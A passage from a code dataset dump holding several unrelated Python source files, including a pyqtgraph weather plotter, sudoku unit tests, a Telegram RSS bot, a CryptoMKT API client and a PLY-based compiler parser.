'homepage-event-reeva')\r\n ])),\r\n url (r'^', include ('auth_peserta.urls'))\r\n]\r\n","sub_path":"homepage/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"233218020","text":"import time\r\nimport numpy as np\r\nfrom datetime import datetime, timedelta\r\nimport pyqtgraph as pg\r\nfrom pyqtgraph.Qt import QtGui\r\n\r\npg.setConfigOption('background', 'k')\r\npg.setConfigOption('foreground', 'w')\r\nmargin = 50\r\n\r\nweather_csv = '/Users/juan/Downloads/Weather Lab - Lab.csv'\r\ndates = list(map(lambda x: datetime.strptime(x, '%m/%d/%y %H:%M').timestamp(),\r\n np.genfromtxt(weather_csv, delimiter=',',\r\n skip_header=1, usecols=0, dtype=(str))))\r\ntemps = np.genfromtxt(weather_csv,\r\n delimiter=',',skip_header=1,usecols=1)\r\nhumes = np.genfromtxt(weather_csv,\r\n delimiter=',',skip_header=1,usecols=2)\r\n\r\napp = QtGui.QApplication([])\r\nwin = pg.GraphicsLayoutWidget(show=True)\r\nwin.setWindowTitle('Lab Weather')\r\nwin.setGeometry(80,80,1000,600)\r\nlabel = pg.LabelItem(justify='center')\r\nwin.addItem(label)\r\n\r\nhumidity_plot = win.addPlot(row=1, col=0, title='Relative Humidity',\r\n axisItems = {'bottom': pg.DateAxisItem()})\r\nhumidity_plot.showGrid(x=True, y=True)\r\nhumidity_plot.setMouseEnabled(y=False,x=False)\r\n\r\nhumidity_plot.plot(dates, humes, pen='r')\r\nrange_ = humidity_plot.getViewBox().viewRange()\r\nhumidity_plot.getViewBox().setLimits(xMin=dates[0], xMax=dates[-1])\r\n\r\nhumidity_plot.setContentsMargins(*(margin,0,margin,0))\r\nhumidity_plot.setLabel(axis='left',text='RH/%')\r\n\r\ntemperature_plot = win.addPlot(row=2, col=0, title='Temperature',\r\n axisItems = {'bottom': pg.DateAxisItem()})\r\ntemperature_plot.showGrid(x=True, y=True)\r\ntemperature_plot.setMouseEnabled(y=False)\r\n\r\ntemperature_plot.plot(dates, temps, pen='g')\r\nrange_ = temperature_plot.getViewBox().viewRange()\r\ntemperature_plot.getViewBox().setLimits(xMin=dates[0], xMax=dates[-1])\r\ntemperature_plot.setContentsMargins(*(margin,0,margin,0))\r\ntemperature_plot.setLabel(axis='left',text='T/C')\r\n\r\nselector_plot = win.addPlot(row=3, col=0, title='% RH',\r\n axisItems = {'bottom': pg.DateAxisItem()})\r\nselector_plot.showGrid(x=True, y=True)\r\nselector_plot.setMouseEnabled(y=False)\r\n\r\nselector_plot.plot(dates, humes, pen='r')\r\nrange_ = selector_plot.getViewBox().viewRange()\r\nselector_plot.getViewBox().setLimits(xMin=dates[0], xMax=dates[-1])\r\nselector_plot.setContentsMargins(*(margin,0,margin,margin))\r\nselector_plot.setLabel(axis='left',text='RH/%')\r\n\r\nregion = pg.LinearRegionItem()\r\nregion.setZValue(10)\r\nselector_plot.addItem(region, ignoreBounds=True)\r\n\r\ndef update():\r\n region.setZValue(10)\r\n minX, maxX = region.getRegion()\r\n if maxX > dates[-1]:\r\n region.setRegion([minX, dates[-1]])\r\n minX, maxX = region.getRegion()\r\n if minX < dates[0]:\r\n region.setRegion([dates[0], maxX])\r\n minX, maxX = region.getRegion()\r\n for aplot in [temperature_plot, humidity_plot]:\r\n aplot.setXRange(minX, maxX, padding=0)\r\n left_timestamp = datetime.fromtimestamp(minX)\r\n right_timestamp = datetime.fromtimestamp(maxX)\r\n label_text = '%s -> %s' % (left_timestamp.strftime(\"%b %d, %Y\"), right_timestamp.strftime(\"%b %d, %Y\"))\r\n label.setText(\"%s\" % label_text)\r\n\r\nregion.sigRegionChanged.connect(update)\r\nregion.setRegion([dates[-1] - 7*24*3600,dates[-1]])\r\n\r\nif __name__ == '__main__':\r\n app.exec_()\r\n","sub_path":"gui/weather_stats.py","file_name":"weather_stats.py","file_ext":"py","file_size_in_byte":3238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"57295942","text":"#!/usr/bin/env python\n\nfrom flexbe_core import EventState, Logger\n\nimport actionlib\nimport rospy\n\nfrom vigir_perception_msgs.msg import *\n\n\n'''\nCreated on 10/22/2014\n\n@author: Philipp Schillinger\n'''\n\nclass LocomotionPosePerceptionState(EventState):\n\t'''\n\tExtracts a pose of interest to walk to from environment data.\n\tNeeds to be tested and maybe updated.\n\n\t-- id_string string Identifier of the request. (?)\n\n\t#> target_pose PoseStamped Pose to plan to.\n\n\t<= detected Was able to detect the requested object and can provide a valid pose.\n\t<= failed Failed to detect an object of interest.\n\n\t'''\n\n\n\tdef __init__(self, id_string = \"\"):\n\t\t'''\n\t\tConstructor\n\t\t'''\n\t\tsuper(LocomotionPosePerceptionState, self).__init__(outcomes=['detected', 'failed'],\n\t\t\t\t\t\t\t\t\t\t\t\t\toutput_keys=['target_pose'])\n\n\t\tself._action_topic = \"/worldmodel_main/get_locomotion_target_pose\"\n\n\t\tself._client = actionlib.SimpleActionClient(self._action_topic, GetLocomotionTargetPoseAction)\n\t\tself._client.wait_for_server(rospy.Duration.from_sec(10))\n\n\t\tself._id_string = id_string\n\n\t\tself._failed = False\n\n\n\tdef execute(self, userdata):\n\t\t'''\n\t\tExecute this state\n\t\t'''\n\t\tif self._failed:\n\t\t\treturn 'failed'\n\n\t\tif self._client.wait_for_result(rospy.Duration.from_sec(0.1)):\n\t\t\tresult = self._client.get_result()\n\t\t\ttarget_pose = result.target_pose\n\t\t\tuserdata.target_pose = target_pose\n\t\t\tif target_pose is None:\n\t\t\t\treturn 'failed'\n\t\t\telse:\n\t\t\t\treturn 'detected'\n\n\n\tdef on_enter(self, userdata):\n\t\taction_goal = GetLocomotionTargetPoseGoal()\n\t\taction_goal.id_string = self._id_string\n\n\t\ttry:\n\t\t\tself._client.send_goal(action_goal)\n\t\texcept Exception as e:\n\t\t\tLogger.logwarn('Was unable to create pose perception request:\\n%s' % str(e))\n\t\t\tself._failed = True\n\n\n\n\n\n\n\n","sub_path":"ariac_behaviors/unit_2_behaviors/unit_2_flexbe_behaviors/src/vigir_behaviors-master/vigir_flexbe_states/src/vigir_flexbe_states/locomotion_pose_perception_state.py","file_name":"locomotion_pose_perception_state.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"465170071","text":"\nimport os\nimport csv\nimport sys\nimport unittest\nfrom unittest.mock import patch\nfrom unittest import skip\n\nimport suduko\n\n\n\n\nclass test_suduko_file_validation(unittest.TestCase):\n\n test_argv = ['suduko.py', 'test.csv']\n \n @patch.object(sys, 'argv', test_argv[0])\n def test_complain_if_no_file_specified(self):\n \n with self.assertRaises(SystemExit) as context:\n suduko.validate_input_file()\n \n self.assertEqual(\n suduko.ERROR_NO_FILE_SPECIFIED, \n context.exception.code)\n\n @patch.object(sys, 'argv', test_argv) \n @patch('suduko.os.path')\n def test_check_file_exists_and_name_returned(self, mock_path):\n \n mock_path.isfile.return_value = False\n with self.assertRaises(SystemExit) as context:\n suduko.validate_input_file()\n self.assertEqual(\n suduko.ERROR_FILE_NOT_FOUND, \n context.exception.code)\n \n mock_path.isfile.return_value = True\n puzzle_file = suduko.validate_input_file()\n self.assertEqual(puzzle_file, self.test_argv[1])\n\nclass test_suduko_check_solution(unittest.TestCase):\n \n def setUp(self):\n self.complete_puzzle = [\n [2,3,1,7,6,9,5,8,4],\n [5,4,6,3,1,8,2,9,7],\n [7,8,9,4,5,2,1,3,6],\n [6,5,3,2,9,1,4,7,8],\n [8,1,4,6,3,7,9,2,5],\n [9,2,7,5,8,4,6,1,3],\n [1,6,5,9,7,3,8,4,2],\n [3,9,2,8,4,6,7,5,1],\n [4,7,8,1,2,5,3,6,9]]\n \n # create test file\n with open('test.csv', 'w', newline='') as csvfile:\n writer = csv.writer(csvfile, delimiter=',',)\n \n\n\n for x in self.complete_puzzle:\n writer.writerow([x])\n \n def tearDown(self):\n try:\n os.remove('test.csv')\n except:\n pass\n \n def test_puzzle_parsed_from_valid_file(self):\n parsed_puzzle = suduko.parse_file('test.csv')\n \n self.assertIsInstance(parsed_puzzle, suduko.Puzzle)\n self.assertEqual(parsed_puzzle.row[0], self.complete_puzzle[0])\n \nif __name__ == '__main__':\n unittest.main()\n \n'''\nReferences\n\nhttps://www.toptal.com/python/an-introduction-to-mocking-in-python\n\n'''","sub_path":"ut.py","file_name":"ut.py","file_ext":"py","file_size_in_byte":2270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"580983595","text":"import numpy as np\n\ndef BlockMM(nr,nc,d,m,x1):\n \"\"\"Function used to compute the analytical solution.\n\n This functions takes an input matrix and reduces it's dimension to observation matrix doing some reshaping and sums.\n\n Args:\n nr: the vertical size of the observation\n nc: the horizontal size of the observation\n d: the scale factor\n m: No. of the pixels of the observation m = nr*nc \n x1: A matrix\n\n Returns:\n Modified matrix\n \"\"\"\n\n nr_x1,nc_x1 = x1.shape\n result=np.empty((int(nc_x1/nc)*m,int(nr_x1/nr)*1),dtype=np.ndarray)\n for i in range(0,nr_x1,nr):\n for j in range(0, nc_x1,nc):\n result[int((i/nr)*m):int((i/nr)*m+m),int(j/nc)]=x1[i:i+nr, j:j+nc].reshape((m,),order=\"F\") \n result=result.reshape((m,d),order=\"F\")\n result=np.sum(result, axis=1)\n return result.reshape(nr,nc,order=\"F\")\n\ndef INVLS(FB,FBC,F2B,FR,mu,d,nr,nc,m,regularization):\n \"\"\"Function to get the SR image.\n\n This functions allows one to get the super resolution image with the FSR algorithm.\n It gives the analytical solution as below :\n x = (B^H S^H SH + mu I )^(-1) R\n \n Args:\n FB: Fourier transform of the blurring kernel B\n FBC: conj(FB)\n F2B: abs(FB)**2\n FR: Fourier transform of R\n d: scale factor d = dr*dc\n nr,nc: size of the observation\n m: No. of the pixels of the observation m = nr*nc \n regularization : Regularization used in the model \n\n Returns:\n Xest->Analytical solution\n FX->Fourier transform of the analytical solution\n \"\"\" \n x1=np.divide(FB*FR,regularization)\n FBR=BlockMM(nr,nc,d,m,x1)\n invW=BlockMM(nr,nc,d,m,np.divide(F2B,regularization))\n invWBR=np.divide(FBR,(invW+mu*d))\n\n nr_FBC, nc_FBC=FBC.shape\n\n FBCinvWBR=np.zeros((nr_FBC,nc_FBC),dtype=np.complex64)\n for i in range(0,nr_FBC,nr):\n for j in range(0, nc_FBC,nc):\n FBCinvWBR[i:i+nr,j:j+nc]=FBC[i:i+nr,j:j+nc]*invWBR\n\n FX=np.divide(FR-FBCinvWBR,regularization)/mu\n Xest=np.real(np.fft.ifft2(FX))\n\n return Xest,FX\n","sub_path":"utils/INVLS.py","file_name":"INVLS.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"45052974","text":"# 给定一个二叉树,返回它的中序 遍历。 \n# \n# 示例: \n# \n# 输入: [1,null,2,3]\n# 1\n# \\\n# 2\n# /\n# 3\n# \n# 输出: [1,3,2] \n# \n# 进阶: ��归算法很简单,你可以通过迭代算法完成吗? \n# Related Topics 栈 树 哈希表 \n# 👍 711 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def inorderTraversal(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n\n \"\"\"\n 递归方案:执行耗时:20 ms,击败了67.63% 的Python用户\n \"\"\"\n\n # if not root:\n # return []\n # return self.inorderTraversal(root.left) + [root.val] + self.inorderTraversal(root.right)\n\n\n \"\"\"\n 迭代方案:执行耗时:20 ms,击败了67.63% 的Python用户\n \n 用栈来存储的解决方案\n 先建立一个栈。一个一个往里存,先访问左边子节点。如果是空,就把栈顶的点输出出来。\n 先用指针找到每颗子树的最左下角,然后进行进出栈操作\n \n \n 例子: 【A, B, C, D, E, F, null]\n \n A\n B C\n D E F\n 中序遍历:DBEAFC\n 栈的变化:\n D\n B B E F\n A A A A C C 出栈完毕\n \"\"\"\n if not root:\n return []\n\n node = root\n stack = []\n ans = []\n\n while stack or node:\n while node:\n # 压入结点\n stack.append(node)\n # 不断访问左边子节点。如果是空说明到达最左边,就跳出循环开始把栈顶的点输出出来\n node = node.left\n\n # 弹出栈顶的值\n node = stack.pop()\n ans.append(node.val)\n # 开始访问右子树\n node = node.right\n return ans\n\n\n\n\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"week02/[94]二叉树的中序遍历.py","file_name":"[94]二叉树的中序遍历.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"346029693","text":"import telepot\nimport json\nfrom django.shortcuts import render\nfrom django.template.loader import render_to_string\nfrom django.http import HttpResponseForbidden, HttpResponseBadRequest, JsonResponse\nfrom django.views.generic import View\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom .parse import parse_rss\n\ntelegramBot = telepot.Bot('')\n\n\ndef showPosts():\n return render_to_string('feed.md', {'items': parse_rss()[1]})\n\n\ndef showHelp():\n return render_to_string('help.md')\n\n\nclass BotView(View):\n def post(self, request, botToken):\n if botToken != '':\n return HttpResponseForbidden('Invalid token')\n\n commands = {\n '/start': showHelp(),\n '/help': showHelp(),\n '/feed': showPosts(),\n }\n\n raw = request.body.decode('utf-8')\n\n try:\n payload = json.loads(raw)\n except ValueError:\n return HttpResponseBadRequest('Invalid request body')\n else:\n chat_id = payload['message']['chat']['id']\n cmd = payload['message'].get('text')\n func = commands.get(cmd.split()[0].lower())\n if func:\n if cmd == '/start':\n (code, response) = parse_rss()\n if code == 200:\n telegramBot.sendMessage(chat_id, func)\n else:\n telegramBot.sendMessage(chat_id, 'Bad request!')\n else:\n telegramBot.sendMessage(chat_id, func)\n else:\n telegramBot.sendMessage(chat_id, 'Not valid command!')\n\n return JsonResponse({}, status=200)\n\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs):\n return super(BotView, self).dispatch(request, *args, **kwargs)\n","sub_path":"yvision_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"503708112","text":"from datetime import datetime\n\n# local\nfrom . import constants as _c\nfrom . import models as _m\nfrom ..base import Client\nfrom .server import CryptoMKTServer\n\n\nclass CryptoMKTPublic(Client):\n\n error_key = 'message'\n\n def __init__(self, timeout: int=30, return_json=False):\n super().__init__(CryptoMKTServer(), timeout)\n self.return_json = return_json\n\n def markets(self):\n url = self.url_for('market')\n data = self.get(url)\n return data['data']\n\n def ticker(self, market_id: str):\n url = self.url_for('ticker')\n params = {\n 'market': str(market_id)\n }\n data = self.get(url, params=params)\n if self.return_json:\n return data\n return _m.Ticker.create_from_json(data['data'])\n\n def order_book(self,\n market_id: str,\n order_type: str,\n page: int=None,\n limit: int=_c.ORDERS_LIMIT):\n params = {\n 'market': str(market_id),\n 'type': str(order_type),\n 'page': page,\n 'limit': limit\n }\n url = self.url_for('book')\n data = self.get(url, params=params)\n if self.return_json:\n return data\n return _m.OrderBook.create_from_json(\n data['data'], data['pagination'])\n\n def trades(self,\n market_id: str,\n start: datetime=None,\n end: datetime=None,\n page: int=None,\n limit: int=_c.ORDERS_LIMIT):\n if isinstance(start, datetime):\n start = start.strftime('%Y-%m-%d')\n if isinstance(end, datetime):\n end = end.strftime('%Y-%m-%d')\n params = {\n 'market': str(market_id),\n 'start': start,\n 'end': end,\n 'page': page,\n 'limit': limit,\n }\n url = self.url_for('trades')\n data = self.get(url, params=params)\n if self.return_json:\n return data\n return _m.Trades.create_from_json(\n data['data'], data.get('pagination'))\n","sub_path":"trading_api_wrappers/cryptomkt/client_public.py","file_name":"client_public.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"510124543","text":"#! /usr/bin/python\nfrom __future__ import print_function\nimport os\nimport fcntl\nimport time\n\n(fd_r, fd_w) = os.pipe()\n\nif os.fork() == 0:\n\twhile True:\n\t\tos.write(fd_w, 'c')\n\t\ttime.sleep(0.7)\nelse:\n\tfcntl.fcntl(fd_r, fcntl.F_SETFL, os.O_NONBLOCK)\n\twhile True:\n\t\ttry:\n\t\t\tr = os.read(fd_r, 1)\n\t\t\tprint(\"Ok\")\n\t\texcept:\n\t\t\tprint(\"Error\")\n\t\ttime.sleep(0.1)\n\n\n","sub_path":"chapitre-25/exemple-nonblock-2.py","file_name":"exemple-nonblock-2.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"12725869","text":"import json\nimport ply.yacc as yacc\nfrom scanner import tokens\nfrom data_structures.functions_directory import FunctionsDirectory\nfrom data_structures.quadruple import Quadruple\nfrom data_structures.semantic_cube import semantic_cube\nfrom data_structures.constant_table import Constanttable\nfrom operaciones import Operations\n\nfun_dict = FunctionsDirectory()\nconst_table = Constanttable()\ntabla_temporales = []\npila_operandos = []\npila_operadores = []\npila_saltos = []\npila_tipos = []\ncuadruplos = []\ntemporal_var = [\"\", \"\"]\ntipo_funcion = 0\ntipo_parametros = []\ntipos_argumentos = []\npila_tipos_argumentos = []\npila_apuntador_argumentos = []\napuntador_argumento = -1\npila_guardar_variable = []\npila_nombre_func = []\nflag_return = False\nflag_dim_uno = False\nflag_dim_dos = False\ndimension_uno = -1\ndimension_dos = -1\n\nglobal_int = 1000\nglobal_float = 4000\nlocal = 8000\nlocal_int = 8000\nlocal_float = 12000\ntemporal_int = 16000\ntemporal_float = 19000\ntemporal_bool = 22000\nconstant_int = 24000\nconstant_float = 28000\nconstant_string = 32000\npointers = 36000\n\ndef restart_variables():\n global fun_dict\n global const_table\n global tabla_temporales\n global pila_operandos\n global pila_operadores\n global pila_saltos\n global pila_tipos\n global cuadruplos\n global temporal_var\n global tipo_funcion\n global tipo_parametros\n global tipos_argumentos\n global pila_tipos_argumentos\n global pila_apuntador_argumentos\n global apuntador_argumento\n global pila_guardar_variable\n global pila_nombre_func\n global flag_return\n global flag_dim_uno\n global flag_dim_dos\n global dimension_uno\n global dimension_dos\n global global_int\n global global_float\n global local\n global local_int\n global local_float\n global temporal_int\n global temporal_float\n global temporal_bool\n global constant_int\n global constant_float\n global constant_string\n global pointers\n\n fun_dict = FunctionsDirectory()\n const_table = Constanttable()\n tabla_temporales = []\n pila_operandos = []\n pila_operadores = []\n pila_saltos = []\n pila_tipos = []\n cuadruplos = []\n temporal_var = [\"\", \"\"]\n tipo_funcion = 0\n tipo_parametros = []\n tipos_argumentos = []\n pila_tipos_argumentos = []\n pila_apuntador_argumentos = []\n apuntador_argumento = -1\n pila_guardar_variable = []\n pila_nombre_func = []\n flag_return = False\n flag_dim_uno = False\n flag_dim_dos = False\n dimension_uno = -1\n dimension_dos = -1\n\n global_int = 1000\n global_float = 4000\n local = 8000\n local_int = 8000\n local_float = 12000\n temporal_int = 16000\n temporal_float = 19000\n temporal_bool = 22000\n constant_int = 24000\n constant_float = 28000\n constant_string = 32000\n pointers = 36000\n\n\n\ncomp_set = {'>', '<', '==', '&', '|', '>=', '<=', '!='}\n\n# programa\ndef p_program(p):\n '''program : PRO r_register_gotomain ID r_register_global PTOCOM opvars opfunciones MAIN r_switch_to_global PARIZQ PARDER bloque'''\n\ndef p_opvars(p):\n '''opvars : vars\n | empty'''\n\ndef p_opfunciones(p):\n '''opfunciones : funciones opfunciones\n | empty'''\n\ndef p_vars(p):\n '''vars : VARTOKEN tipo ID r_register_variable_name arr_uno arr_dos r_verify_array varciclo PTOCOM tipociclo'''\n\ndef p_varciclo(p):\n '''varciclo : COMA ID r_register_variable_name arr_uno arr_dos r_verify_array varciclo\n | empty'''\n\ndef p_arr(p):\n '''arr : CORIZQ CTEI r_register_const CORDER\n | empty'''\n\ndef p_arr_uno(p):\n '''arr_uno : CORIZQ CTEI r_register_const r_arr_dim_uno CORDER\n | empty'''\n\ndef p_arr_dos(p):\n '''arr_dos : CORIZQ CTEI r_register_const r_arr_dim_dos CORDER\n | empty'''\n\ndef p_tipociclo(p):\n '''tipociclo : tipo opciontipo\n | empty'''\n\ndef p_opciontipo(p):\n '''opciontipo : ID r_register_variable_name arr_uno arr_dos r_verify_array varciclo PTOCOM tipociclo\n | MODULE ID r_update_func_type r_update_curr_function_name_especial PARIZQ r_marcar_funcion opcionvarsimple r_desmarcar_funcion PARDER r_register_param_types opvars r_register_quad bloquefunc r_endfunc r_asegurar_return'''\n\ndef p_tipo(p):\n '''tipo : INT r_register_variable_type\n | FLT r_register_variable_type\n | CHAR r_register_variable_type'''\n\ndef p_tipo_func(p):\n '''tipo_func : INT r_register_function\n | FLT r_register_function\n | CHAR r_register_function\n '''\n\ndef p_varsimple(p):\n '''varsimple : tipo ident'''\n\ndef p_funciones(p):\n '''funciones : funcionvoid \n | funcion'''\n\ndef p_funcionvoid(p):\n '''funcionvoid : VOID r_register_function MODULE ID r_update_curr_function_name PARIZQ r_marcar_funcion opcionvarsimple r_desmarcar_funcion PARDER r_register_param_types opvars r_register_quad bloque r_endfunc'''\n\ndef p_opcionvarsimple(p):\n '''opcionvarsimple : varsimple ciclovarsimple\n | empty'''\n\ndef p_ciclovarsimple(p):\n '''ciclovarsimple : COMA varsimple ciclovarsimple\n | empty'''\n\ndef p_funcion(p): \n '''funcion : tipo_func MODULE ID r_update_curr_function_name PARIZQ r_marcar_funcion opcionvarsimple r_desmarcar_funcion PARDER r_register_param_types opvars r_register_quad bloquefunc r_endfunc r_asegurar_return'''\n\ndef p_ident(p):\n '''ident : ID r_register_variable_name arrini arrini'''\n\ndef p_arrini(p):\n '''arrini : CORIZQ CORDER\n | empty'''\n\ndef p_bloque(p):\n '''bloque : KEYIZQ bloqueopcion KEYDER'''\n\ndef p_bloqueopcion(p):\n '''bloqueopcion : estatuto bloqueopcion\n | empty'''\n\ndef p_bloquefunc(p):\n '''bloquefunc : KEYIZQ bloqueopcionfunc KEYDER'''\n\ndef p_bloqueopcionfunc(p):\n '''bloqueopcionfunc : estatutofunc bloqueopcionfunc\n | empty'''\n\ndef p_estatuto(p):\n '''estatuto : asignacion\n | decision\n | escritura\n | llamadafunc\n | repeticion\n | lectura'''\n\ndef p_estatutofunc(p):\n '''estatutofunc : asignacion\n | decisionfunc\n | escritura\n | llamadafunc\n | repeticionfunc\n | lectura\n | RETURN PARIZQ expresion r_return_func PARDER PTOCOM\n '''\n\ndef p_asignacion(p):\n '''asignacion : ID r_verifica_variable_existe r_guardar_variable arrexp_uno arrexp_dos r_pila_operandos_push IGU r_pila_operadores_push_igu expresion r_pop_igu PTOCOM'''\n\ndef p_expresion(p):\n '''expresion : exp r_pop_comp expresionsig'''\n\ndef p_expresionsig(p):\n '''expresionsig : MAY r_pila_operadores_push_may expresionsigequal expresion\n | MEN r_pila_operadores_push_men expresionsigequal expresion\n | DIF r_pila_operadores_push_dif expresion\n | IGUIGU r_pila_operadores_push_iguigu expresion\n | AND r_pila_operadores_push_and expresion\n | OR r_pila_operadores_push_or expresion\n | MAYIGU r_pila_operadores_push_mayigu expresionsigequal expresion\n | MENIGU r_pila_operadores_push_menigu expresionsigequal expresion\n | empty'''\n\ndef p_expresionsigequal(p):\n '''expresionsigequal : IGU\n | empty'''\n\ndef p_exp(p):\n '''exp : termino r_pop_mas expciclo'''\n\ndef p_expciclo(p):\n '''expciclo : MAS r_pila_operadores_push_mas exp\n | MENOS r_pila_operadores_push_menos exp\n | empty\n '''\n\ndef p_termino(p):\n '''termino : factor r_pop_mult factorciclo'''\n\ndef p_factorciclo(p):\n '''factorciclo : MULT r_pila_operadores_push_mult termino\n | DIV r_pila_operadores_push_div termino\n | empty\n '''\n\ndef p_factor(p):\n '''factor : PARIZQ r_marcar_fondo_de_pila expresion r_desmarcar_fondo_de_pila PARDER\n | masomenos varcte\n | ID r_verifica_variable_existe r_guardar_variable opcionid r_pila_operandos_push\n '''\n\ndef p_masomenos(p):\n '''masomenos : MAS\n | MENOS\n | empty\n '''\n\ndef p_opcionid(p):\n '''opcionid : PARIZQ r_era_funcion_retorno parametros r_terminar_parametro PARDER \n | arrexp_uno arrexp_dos '''\n\ndef p_arrexp_uno(p):\n '''arrexp_uno : CORIZQ r_push_arr expresion r_verifica_arrexp_uno CORDER\n | empty'''\n\ndef p_arrexp_dos(p):\n '''arrexp_dos : CORIZQ r_push_arr expresion r_verifica_arrexp_dos CORDER\n | empty'''\n\ndef p_varcte(p):\n '''varcte : iddim\n | CTEI r_pila_operandos_push_cte_int\n | CTEF r_pila_operandos_push_cte_flt\n '''\n\ndef p_parametros(p):\n '''parametros : expresion r_extraer_parametro cicloparametros\n | empty'''\n\ndef p_cicloparametros(p):\n '''cicloparametros : COMA expresion r_extraer_parametro cicloparametros\n | empty\n '''\n\ndef p_llamadafunc(p):\n '''llamadafunc : ID r_verifica_void PARIZQ r_era_funcion_void parametros r_terminar_parametro_void PARDER PTOCOM'''\n\ndef p_decision(p):\n '''decision : IF PARIZQ expresion PARDER r_if_paso_1 THEN bloque decision_else r_if_paso_3'''\n\ndef p_decision_else(p):\n '''decision_else : ELSE r_if_paso_2 bloque\n | empty'''\n\ndef p_decisionfunc(p):\n '''decisionfunc : IF PARIZQ expresion PARDER r_if_paso_1 THEN bloquefunc decisionfunc_else r_if_paso_3\n '''\n\ndef p_decisionfunc_else(p):\n '''decisionfunc_else : ELSE r_if_paso_2 bloquefunc\n | empty'''\n\ndef p_condicional(p):\n '''condicional : WHILE r_while_paso_1 PARIZQ expresion PARDER r_while_paso_2 DO bloque r_while_paso_3'''\n\ndef p_condicionalfunc(p):\n '''condicionalfunc : WHILE r_while_paso_1 PARIZQ r_while_paso_2 expresion PARDER DO bloquefunc'''\n\ndef p_nocondicional(p):\n '''nocondicional : FOR ID r_verifica_variable_existe r_guardar_variable arrexp_uno arrexp_dos r_pila_operandos_push IGU r_pila_operadores_push_igu expresion TO r_pop_igu_for expresion r_for_paso_1 DO bloque r_for_paso_2\n '''\n\ndef p_nocondicionalfunc(p):\n '''nocondicionalfunc : FOR ID r_verifica_variable_existe r_guardar_variable arrexp_uno arrexp_dos r_pila_operandos_push IGU r_pila_operadores_push_igu expresion TO r_pop_igu_for expresion r_for_paso_1 DO bloquefunc r_for_paso_2'''\n\ndef p_escritura(p):\n '''escritura : WRITE PARIZQ escrituraciclo otro PARDER PTOCOM'''\n\ndef p_lectura(p):\n '''lectura : READ PARIZQ ID r_verifica_variable_existe r_guardar_variable arrexp_uno arrexp_dos r_pila_operandos_push r_genera_lectura ciclodim PARDER PTOCOM'''\n\ndef p_escrituraciclo(p):\n '''escrituraciclo : CTE_STRING r_genera_escribe_string\n | expresion r_genera_escribe'''\n\ndef p_otro(p):\n '''otro : COMA escrituraciclo otro\n | empty\n '''\n\ndef p_repeticion(p):\n '''repeticion : condicional \n | nocondicional\n '''\n\ndef p_repeticionfunc(p):\n '''repeticionfunc : condicionalfunc\n | nocondicionalfunc\n '''\n\ndef p_empty(p):\n 'empty :'\n pass\n\ndef p_ciclodim(p):\n '''ciclodim : COMA iddim r_genera_lectura ciclodim\n | empty\n '''\n\ndef p_iddim(p):\n '''iddim : ID r_verifica_variable_existe r_pila_operandos_push_id arrexp arrexp'''\n\ndef p_arrexp(p):\n '''arrexp : CORIZQ expresion CORDER\n | empty'''\n\ndef p_error(p):\n if p:\n print(\"Syntax error at token\", p.type)\n raise Exception(\"ERROR, el input no cumple con todas las reglas gramaticales\")\n\n\n# Counters reset\ndef reset_counters():\n global local\n global temporal_int\n global temporal_float\n global temporal_bool\n\n\n local = 8000\n temporal_int = 16000\n temporal_float = 19000\n temporal_bool = 22000\n\n# * Puntos neurálgicos registro de funciones\ndef p_r_register_gotomain(p):\n 'r_register_gotomain : '\n cuad = Quadruple('goto',None,None,None)\n cuadruplos.append(cuad)\n pila_saltos.append(len(cuadruplos) - 1)\n\ndef p_r_register_global(p):\n 'r_register_global : '\n fun_dict.add_function(\"global\")\n fun_dict.update_curr_function_name(\"global\")\n\ndef p_r_register_function(p):\n 'r_register_function : '\n exists = fun_dict.search_function(p[-1])\n if exists:\n raise Exception(\"La función que intentas declarar ya existe \" + p[-1])\n fun_dict.add_function(p[-1])\n\ndef p_r_register_const(p):\n 'r_register_const : '\n global constant_int\n insertion = const_table.insert_constant(p[-1], 'int', constant_int)\n if insertion == constant_int:\n constant_int += 1\n\n\ndef p_r_switch_to_global(p):\n 'r_switch_to_global : '\n fun_dict.curr_function = fun_dict.directory[0]\n salto = pila_saltos.pop()\n cuadruplos[salto].modificar_resultado(len(cuadruplos))\n\n\ndef p_r_update_curr_function_name_especial(p):\n 'r_update_curr_function_name_especial : '\n fun_dict.update_curr_function_name(p[-2])\n reset_counters()\n\ndef p_r_update_curr_function_name(p):\n 'r_update_curr_function_name : '\n fun_dict.update_curr_function_name(p[-1])\n reset_counters()\n\ndef p_r_register_param_types(p):\n 'r_register_param_types : '\n \n curr_func = fun_dict.curr_function\n global global_float\n global global_int\n \n if curr_func.type == \"float\":\n fun_dict.add_function_to_global(curr_func.name + \"_func\", curr_func.type, global_float)\n global_float += 1\n\n elif curr_func.type == \"int\":\n fun_dict.add_function_to_global(curr_func.name + \"_func\", curr_func.type, global_int)\n global_int += 1\n \n \n\ndef p_r_register_variable_type(p):\n 'r_register_variable_type : '\n if tipo_funcion == 1:\n 